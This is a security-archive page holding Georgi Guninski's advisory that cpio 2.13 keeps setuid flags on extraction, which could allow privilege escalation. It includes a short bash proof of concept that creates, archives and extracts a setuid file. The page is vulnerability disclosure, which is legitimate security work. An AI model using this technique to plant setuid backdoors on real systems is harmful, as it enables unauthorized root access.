Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- cpio 2.13 Privilege Escalation[6]
- Authored by Georgi Guninski[7]
-
cpio version 2.13 suffers from a privilege escalation vulnerability via setuid files in a cpio archive.
- SHA-256 |
e4948bd6237737a1ce41d6d861ca14bf4316c0d417e7e9b48c670388f66f760a
- Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
cpio privilege escalation vulnerability via setuid files in cpio archive
Happy New Year, let in 2024 happiness be with you! :)
When extracting archives cpio (at least version 2.13) preserves
the setuid flag, which might lead to privilege escalation.
One example is r00t extracts to /tmp/ and scidiot runs /tmp/micq/backd00r
without further interaction from root.
We believe this is vulnerability, since directory traversal in cpio
is considered vulnerability.
The POC is trivial, including bash script.
<pre>
====
#!/bin/bash
# cpio privilege escalation via setuid files in cpio archive
# author: Georgi Guninski
# date: Mon Jan 8 07:28:28 AM UTC 2024
# tested on cpio (GNU cpio) 2.13
mkdir -p /tmp/1
cd /tmp/1
touch a
chmod 4555 a
echo -n a | cpio -ocv0 > a.cpio
mkdir -p /tmp/2
cd /tmp/2
cpio -iv < ../1/a.cpio
ls -lh /tmp/2/a
#-r-sr-xr-x. 1 joro joro 0 Jan 8 09:10 /tmp/2/a
====
</pre>
File Tags
- ActiveX[18] (932)
- Advisory[19] (83,640)
- Arbitrary[20] (16,466)
- BBS[21] (2,859)
- Bypass[22] (1,804)
- CGI[23] (1,031)
- Code Execution[24] (7,469)
- Conference[25] (684)
- Cracker[26] (843)
- CSRF[27] (3,355)
- DoS[28] (24,122)
- Encryption[29] (2,375)
- Exploit[30] (52,359)
- File Inclusion[31] (4,237)
- File Upload[32] (982)
- Firewall[33] (822)
- Info Disclosure[34] (2,816)
- Intrusion Detection[35] (900)
- Java[36] (3,091)
- JavaScript[37] (881)
- Kernel[38] (6,868)
- Local[39] (14,601)
- Magazine[40] (586)
- Overflow[41] (12,915)
- Perl[42] (1,428)
- PHP[43] (5,164)
- Proof of Concept[44] (2,355)
- Protocol[45] (3,667)
- Python[46] (1,572)
- Remote[47] (31,126)
- Root[48] (3,609)
- Rootkit[49] (517)
- Ruby[50] (614)
- Scanner[51] (1,646)
- Security Tool[52] (7,941)
- Shell[53] (3,219)
- Shellcode[54] (1,216)
- Sniffer[55] (898)
- Spoof[56] (2,233)
- SQL Injection[57] (16,461)
- TCP[58] (2,419)
- Trojan[59] (687)
- UDP[60] (896)
- Virus[61] (667)
- Vulnerability[62] (32,214)
- Web[63] (9,804)
- Whitepaper[64] (3,761)
- x86[65] (966)
- XSS[66] (18,072)
- Other[67]
File Archives
- January 2024[68]
- December 2023[69]
- November 2023[70]
- October 2023[71]
- September 2023[72]
- August 2023[73]
- July 2023[74]
- June 2023[75]
- May 2023[76]
- April 2023[77]
- March 2023[78]
- February 2023[79]
- Older[80]
Systems
- AIX[81] (429)
- Apple[82] (2,049)
- BSD[83] (375)
- CentOS[84] (57)
- Cisco[85] (1,926)
- Debian[86] (6,941)
- Fedora[87] (1,693)
- FreeBSD[88] (1,246)
- Gentoo[89] (4,408)
- HPUX[90] (880)
- iOS[91] (366)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (69)
- Linux[95] (48,103)
- Mac OS X[96] (691)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (487)
- RedHat[100] (14,763)
- Slackware[101] (941)
- Solaris[102] (1,611)
- SUSE[103] (1,444)
- Ubuntu[104] (9,193)
- UNIX[105] (9,351)
- UnixWare[106] (187)
- Windows[107] (6,617)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]